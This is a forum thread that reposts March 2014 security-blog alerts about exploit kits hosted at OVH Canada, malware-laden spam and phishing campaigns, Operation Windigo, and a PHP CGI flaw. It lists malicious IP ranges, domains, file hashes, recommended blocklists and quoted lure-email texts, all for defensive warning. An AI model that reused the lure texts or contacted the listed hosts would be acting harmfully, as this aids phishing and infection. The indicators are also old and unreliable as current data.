Exploit Kits - OVH Canada / r5x .org ...
FYI...
Exploit Kits - OVH Canada / r5x .org / Penziatki
- http://blog.dynamoo.com/2014/03/evil...penziatki.html
13 Mar 2014 - "Hat tip to Frank Denis (@jedisct1)* for this report** on Nuclear EK's hosted by OVH Canada using their infamous "Penziatki" customer which is linked to black-hat host r5x .org***. The blocks have been identified as belonging to that customer and I would recommend that you block them:
198.27.114.16/30
198.27.114.64/27
198.50.186.232/30
198.50.186.236/30
198.50.186.252/30
198.50.231.204/30
OVH Canada have repeatedly hosted exploit kits for this customer... If you are in a security-sensitive environment then you might simply want to block traffic to the following ranges:
198.27.0.0/16
198.50.0.0/16
Of course this will block many legitimate sites, but if stopping exploit kits is a priority over some user inconvenience then you may want to consider it. If you want a slightly more nuanced blocklist then these ranges contain the biggest concentration of malware:
198.27.114.0/24
198.50.172.0/24
198.50.186.0/24
198.50.197.0/24
198.50.231.0/24 ..."
(More detail at the dynamoo URL above.)
* https://twitter.com/jedisct1
** https://gist.github.com/jedisct1/9509527 - Nuclear Exploit Kit Mar 12
*** http://blog.dynamoo.com/search/label/R5X.org
> http://google.com/safebrowsing/diagnostic?site=AS:16276
___
Malware sites to block 13/3/14
- http://blog.dynamoo.com/2014/03/malw...ock-13313.html
13 Mar 2014 - "These IPs and domains seem to be involved in injection attacks today. I recommend you block them.
64.120.242.178
188.226.132.70
93.189.46.90 ...
The domains being abused are as follows.. many of them appear to be hijacked legitimate domains..."
(Many others listed at the dynamoo URL above.)
___
Fake Blood count result - fake PDF malware
- http://myonlinesecurity.co.uk/import...e-pdf-malware/
13 Mar 2014 - "This email saying IMPORTANT Complete blood count result pretending to come from NICE (National Institute for Health and Care Excellence) has to be the most vicious and evil attempt by any malware purveyor to try to infect a victim. Sending an email saying that you probably have cancer will alarm & distress so many people and is just the most offensive and disgusting attempt to trick a user into opening a malware attachment... another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Other subjects in this evil email attempt to infect you are:
- IMPORTANT:Blood analysis result
- IMPORTANT:Blood analysis
- IMPORTANT:Complete blood count (CBC)result ...
> http://myonlinesecurity.co.uk/wp-con...-CBCresult.png
... 13 March 2014: CBC_Result_9B4824B65E.zip (55kb) Extracts to CBC_scaned_584444449.pdf.exe
Current Virus total detections: 2/50*... careful when unzipping them and make sure you have “show known file extensions enabled"**, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/d...is/1394703905/
** http://myonlinesecurity.co.uk/why-yo...wn-file-types/
___
Key Secured Message -fake- PDF malware
- http://myonlinesecurity.co.uk/key-se...e-pdf-malware/
13 March 2014 - "Key Secured Message pretending to come from Payroll Reports <payroll @quickbooks .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details...
> http://myonlinesecurity.co.uk/wp-con...ed-Message.png
... Extracts to NIKON-2013564-JPEG.scr ... Current Virus total detections: 2/50*
This Key Secured Message is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en-gb/fil...55c2/analysis/
___
Fake Sky .com "Statement of account" SPAM
- http://blog.dynamoo.com/2014/03/skyc...ount-spam.html
13 Mar 2014 - "This -fake- Sky .com email comes with a malicious attachment:
Date: Thu, 13 Mar 2014 12:23:09 +0100 [07:23:09 EDT]
From: "Sky .com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for the December invoice as this is now due for
payment.
Regards, Carmela ...
Wilson McKendrick LLP Solicitors ...
Attached is an archive Statement.zip which in turn contains a malicious executable Statement.scr which has a VirusTotal detection rate of 6/50*. Automated analysis tools... show attempted connections to the following domains and IPs:
188.247.130.190 (Prime Telecom SRL, Romania)
gobemall .com
gobehost .info
184.154.11.228 (Singlehop, US)
terenceteo .com
184.154.11.233 (Singlehop, US)
quarkspark .org
The two Singlehop IPs appear to belong to Host The Name (hostthename .com) which perhaps indicates a problem at that reseller.
Recommended blocklist:
184.154.11.228
184.154.11.233
188.247.130.190
gobemall .com
gobehost .info
terenceteo .com
quarkspark .org "
* https://www.virustotal.com/en-gb/fil...is/1394715270/
___
HM Revenue & Customs Spam
- http://threattrack.tumblr.com/post/7...e-customs-spam
Mar 12, 2014 - "Subjects Seen:
HMRC Tax Notice
Typical e-mail details:
Dear <email address>
Please be advised that one or more Tax Notices (P6, P6B) have been issued.
For the latest information on your Tax Notices (P6, P6B) please open attached report.
Document Reference: 6807706.
Malicious File Name and MD5:
PDF_Scanned_HMRCBBD45F6647.zip (09BA8CF32FDDE3F73EA8F2E6F75BDF1E)
scaned_7246582_pdf_4364534533.exe (3F347C85BEA303904975FF0A8DE49E7E)
Screenshot: https://gs1.wac.edgecastcdn.net/8019...Ge41r6pupn.png
Tagged: HMRC, weelsof
:mad: :fear:
Google Docs users Targeted - Phishing Scam ...
FYI...
Google Docs users Targeted - Phishing Scam
- http://www.symantec.com/connect/blog...-phishing-scam
13 Mar 2014 - "We see -millions- of phishing messages every day, but recently, one stood out: a sophisticated scam targeting Google Docs and Google Drive users. The scam uses a simple subject of "Documents" and urges the recipient to view an important document on Google Docs by clicking on the included link. Of course, the link doesn't go to Google Docs, but it does go to Google, where a very convincing fake Google Docs login page is shown:
Google Docs phishing login page:
> http://www.symantec.com/connect/site...site_image.png
The -fake- page is actually hosted on Google's servers and is served over SSL, making the page even more convincing. The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there, and then used Google Drive's preview feature to get a publicly-accessible URL to include in their messages. This login page will look familiar to many Google users, as it's used across Google's services. (The text below "One account. All of Google." mentions what service is being accessed, but this is a subtlety that many will not notice.) It's quite common to be prompted with a login page like this when accessing a Google Docs link, and many people may enter their credentials without a second thought. After pressing "Sign in", the user’s credentials are sent to a PHP script on a -compromised- web server. This page then redirects to a real Google Docs document, making the whole attack very convincing. Google accounts are a valuable target for phishers, as they can be used to access many services including Gmail and Google Play, which can be used to purchase Android applications and content..."
___
ABSA Global business - certificate update – fake PDF malware
- http://myonlinesecurity.co.uk/absa-g...e-pdf-malware/
Mar 14, 2014 - "ABSA Global business customers 'certificate update' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. ABSA Global is a South African Bank so I wouldn’t expect a high number of US or UK citizens to have accounts with them, so this should be a quite obvious scam, phishing, malware attack to the majority of users. After examination of the malware, although many Antiviruses detect it as a Zbot, It looks more like an Androm version, possibly dropped by Asprox botnet. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
Attention!
On March 14, 2014 server upgrade will take place. Due to this the system may be offline for approximately half an hour.
The changes will concern security, reliability and performance of mail service and the system as a whole.
For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.
This procedure is quite simple. All you have to do is just to install new server certificate attached to the letter.
Thank you in advance for your attention to this matter and sorry for possible inconveniences.
System Administrator ABSA Global
cert p12 install instruction.zip (58kb) - Extracts to ABSA cert p12 install instruction.exe
Current Virus total detections: 11/50* ... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f...5843/analysis/
___
Fake Facebook messages
- http://myonlinesecurity.co.uk/fake-facebook-messages/
Mar 14, 2014 - "... plagued by Fake Facebook messages saying ” somebody commented on your status” (1) or “You requested a new Facebook password” (2) ...
1) http://myonlinesecurity.co.uk/wp-con...our-status.png
2) http://myonlinesecurity.co.uk/wp-con...k-password.png
Always -hover- over the links in these emails and you will see that they do -not- lead to Facebook. Do not click on the links, just delete the emails as soon as they arrive. Thee is always the very high possibility that one of the other botnets will use these to send you to a malicious site where your computer will be infected, rather than trying to scam you out of money by selling fake medicines that could kill you."
___
Banks to be hit with MS costs for running outdated ATMs
- http://www.reuters.com/article/2014/...0M345C20140314
LONDON/NEW YORK, March 14, 2014 - "Banks around the world, consumed with meeting more stringent capital regulations, will miss a deadline to upgrade outdated software for automated teller machines (ATMs) and face additional costs to Microsoft to keep them secure. The U.S. software company first warned that it was planning to end support for Windows XP in 2007, but only one-third of the world's 2.2 million ATMs which use the system will have been upgraded to a new platform, such as Windows 7 by the April deadline, according to NCR, one of the biggest ATM makers. To ensure the machines are protected against viruses and hackers many banks have agreed deals with Microsoft to continue supporting their ATMs until they are upgraded, extra costs and negotiations that were avoidable but are now likely to be a distraction for bank executives... Britain's five biggest banks - Lloyds Banking Group , Royal Bank of Scotland, HSBC, Barclays and Santander UK - either have, or are in the process of negotiating, extended support contracts with Microsoft. The cost of extending support and upgrading to a new platform for each of Britain's main banks would be in the region of 50 to 60 million pounds ($100 million), according to Sridhar Athreya, London-based head of financial services advisory at technology firm SunGard Consulting, an estimate corroborated by a source at one of the banks. Athreya said banks have left it late to upgrade systems after being overwhelmed by new regulatory demands in the wake of the 2007-08 financial crisis... Windows XP currently supports around 95 percent of the world's ATMs... many of the banks operating them will still be running their ATMs with Windows XP for a while after the April 8 deadline..."
___
Bogus online casino themed campaigns intercepted in the wild
- http://www.webroot.com/blog/2014/03/...ead-w32casino/
Mar 14, 2014 - "... proliferation of social engineering driven, privacy-violating campaigns serving W32/Casino variants. Relying on affiliate based revenue sharing schemes and spamvertised campaigns as the primary distribution vectors, the rogue operators behind them continue tricking tens of thousands of gullible users into installing the malicious applications. We’ve recently intercepted a series of spamvertised campaigns distributing W32/Casino variants...
Sample screenshots of the landing pages for the rogue casinos:
1) https://www.webroot.com/blog/wp-cont...ationc_PUA.png
2) https://www.webroot.com/blog/wp-cont...onc_PUA_01.png
3) https://www.webroot.com/blog/wp-cont...onc_PUA_02.png
4) https://www.webroot.com/blog/wp-cont...onc_PUA_03.png
5) https://www.webroot.com/blog/wp-cont...onc_PUA_04.png
6) https://www.webroot.com/blog/wp-cont...5-1024x576.png
Spamvertised URLs:
hxxp ://bit. ly/1brCoxg
hxxp ://bit .ly/1bQRudq
hxxp ://bit .ly/1mLQr5I
hxxp ://bit .ly/MCOyaL
hxxp ://bit .ly/1ec3UMN
hxxp ://bit .ly/1hN6Vbd
hxxp ://bit .ly/1mQ3XFu
hxxp ://bit .ly/17DJ4pZ
hxxp ://bit .ly/1ec2JNa
hxxp ://bit .ly/1fBY6d5
W32.Casino PUA domains reconnaisance:
hxxp ://rubyfortune .com – 78.24.211.177
hxxp ://grandparkerpromo .com – 95.215.61.160
hxxp ://kingneptunescasino1 .com – 67.211.111.169
hxxp ://riverbelle1 .com – 193.169.206.233
hxxp ://europacasino .com – 87.252.217.13
hxxp ://vegaspartnerlounge .com – 66.212.242.136
Sample detection rates for the W32/Casino PUA:
MD5: b80db6ec0e6c968499ce01232fbfdc5c * ... W32/Casino.P.gen!Eldorado
MD5: a2a545adf4498e409f7971f326333333 ** ... Heuristic.BehavesLike.Win32.Suspicious-DTR.S
MD5: a2a545adf4498e409f7971f326333333 *** ... W32/Casino.P.gen!Eldorado
MD5: 1cd6db7edbbc07d1c68968f584c0ac82 **** ... W32/Casino.P.gen!Eldorado
... (More) Known to have been downloaded from the same IP (87.248.203.254) ..."
* https://www.virustotal.com/en/file/1...is/1394642298/
** https://www.virustotal.com/en/file/4...is/1394642439/
*** https://www.virustotal.com/en/file/3...is/1394643637/
**** https://www.virustotal.com/en/file/4...is/1394643413/
:mad: :fear: :sad:
Something evil on 198.50.140.64/27, 192.95.6.196/30 ...
FYI...
Something evil on 198.50.140.64/27
- http://blog.dynamoo.com/2014/03/some...501406427.html
17 Mar 2014 - "Thanks again to Frank Denis (@jedisct1) for this heads up* involving grubby web host OVH Canada and their black hat customer "r5x .org / Penziatki" hosting the Nuclear EK in 198.50.140.64/27. A full list of all the web sites I can find associated with this range can be found here**, but the simplest thing to do is block 198.50.140.64/27 completely (or if you are paranoid about security and don't mind some collateral damage block 198.27.0.0/16 and 198.50.0.0/16). Domains in use that I can identify are listed below. I recommend you block -all- of them. Domains listed as malicious by Google are in red, those listed as suspect by SURBL are in italics.
Recommended blocklist:
198.50.140.64/27
ingsat .eu
kingro .biz ..."
(More detail and domains listed at the dynamoo URL above.)
* https://twitter.com/jedisct1/status/445220289534631937
** http://pastebin.com/kkPRKu6v
___
Something evil on 192.95.6.196/30
- http://blog.dynamoo.com/2014/03/some...295619630.html
17 Mar 2014 - "Another useful tip by Frank Denis* on evil in the OVH Canada IP ranges, suballocated to their black hat customer "r5x .org / Penziatki", this time on 192.95.6.196/30. The following domains should be considered as dangerous and I would recommend blocking them as soon as possible:
shoalfault .ru
addrela .eu
backinl .org
A full list of the domains I can find in this /30 can be found here** [pastebin].
Given the extremely poor reputation of these OVH Canada ranges, I would suggest blocking the following network ranges if you have a security-sensitive environment and are prepared to put up with the collateral damage of blocking some legitimate sites:
198.27.0.0/16
198.50.0.0/16
198.95.0.0/16 "
* https://twitter.com/jedisct1/status/445690516433145856
** http://pastebin.com/RWG8uj00
___
Bank of America / Merrill Lynch - Completion of request for ACH CashPro – fake PDF malware
- http://myonlinesecurity.co.uk/bank-a...e-pdf-malware/
Mar 17, 2014 - "Bank of America Merrill Lynch Completion of request for ACH CashPro is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details...
> http://myonlinesecurity.co.uk/wp-con...CH-CashPro.png
17 March 2014 securedoc.zip (12kb) Extracts to securedoc.exe
Current Virus total detections: 2/49* - MALWR Auto Analysis**
This Bank of America Merrill Lynch Completion of request for ACH CashPro is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/4...9bf5/analysis/
** https://malwr.com/analysis/Njc2MjY3Y...VhYTEyMzI4OTY/
___
Injection attack in progress 17/3/14
- http://blog.dynamoo.com/2014/03/inje...ess-17314.html
17 Mar 2014 - "A couple of injection attacks seem to be in progress, I haven't quite got to the bottom of them yet.. but you might want to block the following domains:
fsv-hoopte-winsen .de
grupocbi .com
These are hosted on 82.165.77.21 and 72.47.228.162 respectively. The malware is resistant to automated tools and redirects improperly-formed attempt to analyse it to Bing [1] [2]. The malware is appended to hacked .js files on target sites... This sort of attack has been used to push -fake- software updates* in the past. Even though I can't quite get to the bottom of this at the moment, you can be pretty sure that this is Nothing Good and I would recommend blocking these domains."
1) http://urlquery.net/report.php?id=9933756
2) http://urlquery.net/report.php?id=9933677
* http://blog.dynamoo.com/2014/01/scri...end-media.html
___
Fake Personal message from Gmail Service – spam
- http://myonlinesecurity.co.uk/fake-p...-service-spam/
Mar 17, 2014 - "< your name> Personal message from Gmail Service is an alternative version of the Fake Facebook messages*. Just like the Facebook versions these either take you to a Women’s Health page trying to sell you fake drugs for slimming or other women’s problems. Other days they send you to one of the Canadian or Russian Pharmacy pages selling Viagra, valium or other illegal drugs.
Fake Personal message from Gmail Service
> http://myonlinesecurity.co.uk/wp-con...il-message.png
Always -hover- over the links in these emails and you will see that they do -not- lead to Gmail. Do -not- click on the links, just delete the emails as soon as they arrive. There is always the very high possibility that one of the other -botnets- will use these to send you to a malicious site where your computer will be infected, rather than trying to scam you out of money by selling fake medicines..."
* http://myonlinesecurity.co.uk/fake-facebook-messages/
___
Fake Salesforce/Quickbooks invoice - malware
- http://blog.dynamoo.com/2014/03/sale...d-overdue.html
Mar 17, 2014 - "This -fake- Salesforce spam comes with a malicious attachment... actually two malicious attachments..
Date: Mon, 17 Mar 2014 16:12:20 +0100 [11:12:20 EDT]
From: "support @ salesforce .com" [support @ salesforce .com]
Subject: Please respond - overdue payment
Priority: High Priority 2
Please find attached your invoices for the past months. Remit the payment by 01/9/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Alvaro Rocha
This e-mail has been sent from an automated system...
Attached are two archive files quickbook_invoice_89853654.rar and quickbook_invoice_8988561346654.zip which in turn contain the same malicious executable quickbook_invoice.scr which has a VirusTotal detection rate of 8/49*. Automated analysis tools... don't give much of a clue as to what is going on..."
* https://www.virustotal.com/en-gb/fil...is/1395087978/
:fear: :mad:
AMEX phish, Gov't Biz Dept SPAM ...
FYI...
AMEX phish...
- http://myonlinesecurity.co.uk/americ...hing-attempts/
Mar 18, 2014 - "We are seeing quite a few American Express -phishing- attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. They are using literally hundreds if not thousands of -hijacked- websites to perform these attacks. The site listed in the email is the first step in the chain and you are bounced on to other sites. The coding on the primary hijacked sites suggest that they are under the control of the Blackhole and Angler exploit kit criminals. This means that at any time when they have taken stolen enough identities and money, they will switch to spreading malware via the same network and emails. Do not click any links in these emails. Hover your mouse over the links and you will see a web address that isn’t American Express. Immediately -delete- the email and the safest way to make sure that it isn’t a genuine email form American Express is to type the American Express web address in your browser. and then log in to the account that way. There are currently 2 main avenues of the American Express phishing attempts:
AmericanExpress phishing attempts:
1) http://myonlinesecurity.co.uk/wp-con...hing-email.png
2) http://myonlinesecurity.co.uk/wp-con...hing-email.png
Following the link in these takes you to a website that looks exactly like the real American Express site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace ( if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life..."
___
Gov't Biz Dept. – fake PDF malware
- http://myonlinesecurity.co.uk/govern...e-pdf-malware/
Mar 18, 2014 - "Government Business Departament pretending to come (from a) Department for Business Innovation & Skills <business_dep@ gov .uk> from is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Please note the poor -spelling- in the email subject, which should be enough of a flag to warn users of the -fake- . Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details.
> http://myonlinesecurity.co.uk/wp-con...epartament.png
... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___
Fake YouTube email – fake mov malware
- http://myonlinesecurity.co.uk/receiv...e-mov-malware/
Mar 18, 2014 - "'You have received a YouTube video' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details... plain simple email with subject You have received a YouTube video and content just says 'Sent from my iPad'...
18 March 2014 : VIDEO_819562694.MOV.ZIP (79kb) : Extracts to VIDEO_890589685.MOV.exe
Current Virus total detections: 6/50*
... another one of the spoofed icon files... will look like a proper mov ( movie) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5...69ae/analysis/
Screenshot: https://gs1.wac.edgecastcdn.net/8019...ywx1r6pupn.png
___
500,000 PCs attacked after 25,000 UNIX servers hijacked ...
- http://www.welivesecurity.com/2014/0...ation-windigo/
Mar 18, 2014 - "... Researchers at ESET, in collaboration with CERT-Bund, the European Organization for Nuclear Research (CERN), the Swedish National Infrastructure for Computing and other agencies, have uncovered a widespread cybercriminal operation that has seized control of tens of thousands of Unix servers. And if your system is found to be infected, experts strongly recommend you re-install the operating system, and consider all credentials used to log into the machine as compromised. In short, if you are a victim, all passwords and private OpenSSH keys should be changed. The attack, which has been given the name “Windigo” after a mythical creature from Algonquian Native American folklore, has resulted in over 25,000 Unix servers being hacked, resulting in 35 million spam messages being sent each day from compromised machines...
> http://www.welivesecurity.com/wp-con...digo-spam.jpeg
... That would be bad enough, normally. But in this case, malicious hackers have also been using hijacked web servers to infect visiting Windows PCs with click fraud and spam-sending malware, and display dating website adverts to Mac users. Even smartphone users don’t escape – finding their iPhones redirected to X-rated content, with the intention of making money for the cybercriminals...
> http://www.welivesecurity.com/wp-con...go-iphone.jpeg
ESET’s security research team has published a detailed technical paper* into “Operation Windigo”, and says it believes that the cybercrime campaign has been gathering strength, largely unnoticed by the security community, for over two and a half years..."
An analysis of the visiting computers revealed a wide range of operating systems being used:
> http://www.welivesecurity.com/wp-con...ims-by-os.jpeg
(More detail at the welivesecurity URL at the top.)
* http://www.welivesecurity.com/wp-con...on_windigo.pdf
Indicators of Compromise
- https://github.com/eset/malware-ioc
:mad: :fear:
OVH Canada hosted exploit kits, Twitter Spamrun ...
FYI...
More OVH Canada hosted exploit kits
- http://blog.dynamoo.com/2014/03/more...loit-kits.html
19 Mar 2014 - "... Yesterday Frank identified three new OVH Canada ranges* being used to host the Nuclear EK [1], again the customer is "r5x .org / Penziatki"
198.50.212.116/30
198.50.131.220/30
192.95.40.240/30
Update: also 192.95.51.164/30 according to this Tweet**... A full list of everything I can find is here*** [pastebin] ... At a mininum I recommend that you block those IP ranges and/or domains.
Given the extremely poor reputation of these OVH Canada ranges, I would suggest blocking the following network ranges if you have a security-sensitive environment and are prepared to put up with the collateral damage of blocking some legitimate sites:
198.27.0.0/16
198.50.0.0/16
198.95.0.0/16 "
(More detail at the dynamoo URL above.)
* https://twitter.com/jedisct1/status/445970337490927616
** https://twitter.com/jedisct1/status/446154856093343744
*** http://pastebin.com/4eGWBwHV
1] http://krebsonsecurity.com/tag/nuclear-exploit-pack/
Updated - Mar 20, 2014: http://blog.dynamoo.com/search/label/OVH
___
Something evil on 64.120.242.160/27
- http://blog.dynamoo.com/2014/03/some...024216027.html
19 Mar 2014 - "64.120.242.160/27 (Network Operations Center, US) is hosting a number of exploit domains (see this example report at VirusTotal*). There appears to be a variety of badness involved, and many of the domains hosted in the range are flagged as malicious by Google or SURBL (report here** [csv]). There appears to be nothing legitimate in this whole range. Domains flagged as malicious by Google are highlighted, ones marked as malicious by SURBL are in italics. I would recommend you block the entire lot.
64.120.242.160/27
asifctuenefcioroxa .net
hukelmshiesuy .net
asifctuenefcioroxa .com
asifctuenefcioroxa .info ..."
(Long list at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/ip-...0/information/
** http://www.dynamoo.com/files/64.120.242.160-27.csv
___
Fake NatWest SPAM ...
- http://blog.dynamoo.com/2014/03/natw...ed-secure.html
19 Mar 2014 - "This -fake- NatWest spam has a malicious attachment:
Date: Wed, 19 Mar 2014 15:14:02 +0100 [10:14:02 EDT]
From: NatWest [secure.message@ natwest .co .uk]
Subject: You have received a secure message
You have received a secure message
Read your secure message by opening the attachment, SecureMessage.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 4226.
First time users - will need to register after opening the attachment...
Attached to the message is an archive file SecureMessage.zip which in turn contains a malicious executable SecureMessage.scr which has a VirusTotal detection rate of 8/51*. Automated analysis tools... show attempted downloads from the following domains, both hosted on servers that appear to be completely compromised and should be blocked.
199.193.115.111 (NOC4Hosts, US) ...
184.107.149.74 (iWeb, Canada) ...
50.116.4.71 (Linode, US) ...
Recommended blocklist:
199.193.115.111
184.107.149.74
50.116.4.71 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/fil...is/1395245960/
Screenshot: https://gs1.wac.edgecastcdn.net/8019...ol61r6pupn.png
___
Steer Clear of the Latest Twitter Spamrun
- http://blog.malwarebytes.org/social-...itter-spamrun/
Mar 19, 2014 - "Watch out for messages on your Twitter feed like the ones below, because they’ll try their best to give your account a bad hair day:
> http://cdn.blog.malwarebytes.org/wp-...twitphish1.jpg
Some of the (many) messages read as follows, and all are designed to entice the recipient into clicking:
lmao I had a eerie feeling this was yours
haha this post by you is so funny
haha this was made by you?
Im laughing so much right now at this
haha this update by you is odd
lol I had a eerie feeling this was you
lolz this post by you is nuts
lol this was posted by you?
omfg this entry by you is crazy
lolz this tweet by you is so funny
LOL you got 2 see this, its epic
omfg this post by you is cool
lolz this post by you is hilarious... (more)
There are others, but those seem to be the main ones and everything else is typically a variation on the above themes. The links take end-users to a site informing them of the following:
“Your current session has ended
For security purposes you were forcibly signed out. For security purposes you need to verify your Twitter account, please login”
> http://cdn.blog.malwarebytes.org/wp-...3/twitpsh2.jpg
... change your password if you think you’ve already been affected by this one and clear up any rogue links lying around on your feed – your followers will thank you for it.
Christopher Boyd (Hat-tip to @Cliffsull *)"
* https://twitter.com/cliffsull
:mad::mad:
Something evil on 66.96.195.32/27, PHP bug ...
FYI...
Something evil on 66.96.195.32/27
- http://blog.dynamoo.com/2014/03/some...961953227.html
Mar 20, 2014 - "Another bad bunch of IPs hosted by Network Operations Center in Scranton following on from yesterday*, this time 66.96.195.32/27 which seems to be more of the same thing. The exploit kit in question is the Goon EK, as shown in this URLquery report**. It seems that it spreads by malicious SWF files being injected into legitimate websites (I think this one, for example [3]). The easiest thing to do would be to block traffic to 66.96.195.32/27, but I can see... malicious websites active in that range (all on 66.96.195.49 [4])..."
* http://blog.dynamoo.com/2014/03/some...024216027.html
** http://urlquery.net/report.php?id=1395311494976
3] http://urlquery.net/report.php?id=1395322515680
4] https://www.virustotal.com/en/ip-add...9/information/
___
PHP bug allowing site hijacking still menaces Internet 22 months on
- http://arstechnica.com/security/2014...-22-months-on/
Mar 19 2014 - "A vulnerability that allows attackers to take control of websites running older versions of the PHP scripting language continues to threaten the Internet almost two years after security researchers first warned that attackers could use it to remotely execute malicious code on vulnerable servers. As Ars reported 22 months ago, the code-execution exploits worked against PHP sites only when they ran in common gateway interface mode, a condition that applied by default to those running the Apache Web server. According to a blog post published Tuesday*, CVE-2012-1823**, as the vulnerability is formally indexed, remains under attack today by automated scripts that scour the Internet in search of sites that are susceptible to the attack. The sighting of in-the-wild exploits even after the availability of security patches underscores the reluctance of many sites to upgrade... PHP versions prior to 5.3.12 and 5.4.2 are vulnerable. The Imperva blog post* said that an estimated 16 percent of public websites are running a vulnerable version. People running susceptible versions should upgrade right away. Readers who visit vulnerable sites should notify the operators of the risk their site poses..."
* http://blog.imperva.com/2014/03/thre...r-command.html
Mar 18, 2014
** https://web.nvd.nist.gov/view/vuln/d...=CVE-2012-1823 - 7.5 (HIGH)
Last revised: 07/20/2013
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/cent...utbreak.x?i=77
Fake Product Shipping Documents Email Messages - 2014 Mar 20
Fake Financial Documents Email Messages - 2014 Mar 20
Email Messages with Malicious Attachments - 2014 Mar 20
Fake Tax Return Notification Email Messages - 2014 Mar 20
Email Messages with Malicious Attachments - 2014 Mar 20
Fake Document Processing Request Email Messages - 2014 Mar 20
Fake Fax Message Delivery Email Messages - 2014 Mar 20
Fake Product Order Quotation Email Messages - 2014 Mar 20
Fake Tax Document Email Messages - 2014 Mar 20
Fake Payroll Information Notification Email Messages - 2014 Mar 20
Fake Incoming Money Transfer Notification Email Messages - 2014 Mar 20
Fake Bank Payment Transfer Notification Email Messages - 2014 Mar 20
Fake Lawsuit Details Attachment Email Messages - 2014 Mar 20
Fake Account Payment Information Email Messages - 2014 Mar 20
Fake Product Order Notification Email Messages - 2014 Mar 20
Fake Failed Delivery Notification Email Messages - 2014 Mar 20
Fake Bank Transaction Notification Email Messages - 2014 Mar 19
(More detail and links at the cisco URL above.)
:mad: :sad:
Fake Amazon, Companies House SPAM, Something evil on 50.116.4.71 ...
FYI...
Fake Amazon .co .uk SPAM, Something evil on 50.116.4.71
- http://blog.dynamoo.com/2014/03/amaz...g-evil-on.html
21 Mar 2014 - "This -fake- Amazon .co .uk spam comes with a malicious attachment:
Date: Fri, 21 Mar 2014 13:40:05 +0530 [04:10:05 EDT]
From: "AMAZON .CO .UK" [SALES@ AMAZON .CO .UK]
Cc: ; Fri, 21 Mar 2014 13:40:05 +0530
Subject: Your Amazon.co.uk order ID841-6379889-7781077
Hello, Thanks for your order. We’ll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details
Order #799-5059801-3688207 Placed on March 21, 2014 Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon .co .uk...
There is an attachment Order details 21.04.2014 Amazon 19-1101.zip which contains a quite large 596Kb malicious executable Order details 21.04.2014 Amazon 19-1101.exe which only has a VirusTotal detection rate of 2/51*. The Malwr analysis** the most comprehensive, and shows that it attempts to phone home... Out of these, aulbbiwslxpvvphxnjij .biz seems to be active on 50.116.4.71 (Linode, US). Combining the "phone home" domains with the other malicious domains hosted on that IP gives the following recommended blocklist:
50.116.4.71
afaxdlrnjdevgddqrcvkdmvemwo .org ..."
(Long list at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/fil...is/1395393900/
